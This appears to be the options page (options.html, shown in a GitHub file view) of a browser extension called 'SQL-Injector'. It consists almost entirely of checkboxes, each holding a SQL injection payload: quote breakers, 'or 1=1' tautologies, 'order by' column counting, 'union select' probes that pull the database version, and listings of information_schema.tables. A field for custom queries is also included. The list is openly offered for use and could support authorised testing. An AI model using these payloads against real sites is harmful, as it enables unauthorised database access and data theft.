-
Notifications
You must be signed in to change notification settings - Fork 0
/
options.html
57 lines (55 loc) · 4.55 KB
/
options.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<html>
<head>
<title>SQL-Injector Options</title>
</head>
<script src="options.js"></script>
<body>
Your Choice:
<form id="choice">
<input type="checkbox" name="checkbox" value="'">'<br>
<input type="checkbox" name="checkbox" value=" or 1=1 --"> or 1=1 --<br>
<input type="checkbox" name="checkbox" value="' or 1=1 --">' or 1=1 --<br>
<input type="checkbox" name="checkbox" value="' or 1=1">' or 1=1<br>
<input type="checkbox" name="checkbox" value=" order by 1--"> order by 1--<br>
<input type="checkbox" name="checkbox" value=" order by 2--"> order by 2--<br>
<input type="checkbox" name="checkbox" value=" order by 3--"> order by 3--<br>
<input type="checkbox" name="checkbox" value=" order by 4--"> order by 4--<br>
<input type="checkbox" name="checkbox" value=" order by 5--"> order by 5--<br>
<input type="checkbox" name="checkbox" value=" order by 6--"> order by 6--<br>
<input type="checkbox" name="checkbox" value=" order by 7--"> order by 7--<br>
<input type="checkbox" name="checkbox" value=" order by 8--"> order by 8--<br>
<input type="checkbox" name="checkbox" value=" order by 9--"> order by 9--<br>
<input type="checkbox" name="checkbox" value=" order by 10--"> order by 10--<br>
<input type="checkbox" name="checkbox" value=" union select 1--"> union select 1--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2--"> union select 1,2--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3--"> union select 1,2,3--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4--"> union select 1,2,3,4--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5--"> union select 1,2,3,4,5--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5,6--"> union select 1,2,3,4,5,6--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5,6,7--"> union select 1,2,3,4,5,6,7--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5,6,7,8--"> union select 1,2,3,4,5,6,7,8--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5,6,7,8,9--"> union select 1,2,3,4,5,6,7,8,9--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,3,4,5,6,7,8,9,10--"> union select 1,2,3,4,5,6,7,8,9,10--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4--"> union select 1,version(),3,4--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5--"> union select 1,version(),3,4,5--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5,6--"> union select 1,version(),3,4,5,6--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5,6,7--"> union select 1,version(),3,4,5,6,7--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5,6,7,8--"> union select 1,version(),3,4,5,6,7,8--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5,6,7,8,9--"> union select 1,version(),3,4,5,6,7,8,9--<br>
<input type="checkbox" name="checkbox" value=" union select 1,version(),3,4,5,6,7,8,9,10--"> union select 1,version(),3,4,5,6,7,8,9,10--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4 from information_schema.tables--"> union select 1,2,table_name,4 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4,5 from information_schema.tables--"> union select 1,2,table_name,4,5 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4,5,6 from information_schema.tables--"> union select 1,2,table_name,4,5,6 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4,5,6,7 from information_schema.tables--"> union select 1,2,table_name,4,5,6,7 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4,5,6,7,8 from information_schema.tables--"> union select 1,2,table_name,4,5,6,7,8 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value=" union select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables--"> union select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables--<br>
<input type="checkbox" name="checkbox" value="other">other:<br><textarea id="yourOwnQuery" placeholder="Write your query..." cols="50"></textarea>
<button id="queryButton" onclick="add()">Add query!</button>
</form>
<br>
<div id="status"></div>
<button id="save">
Save
</button>
</body>
</html>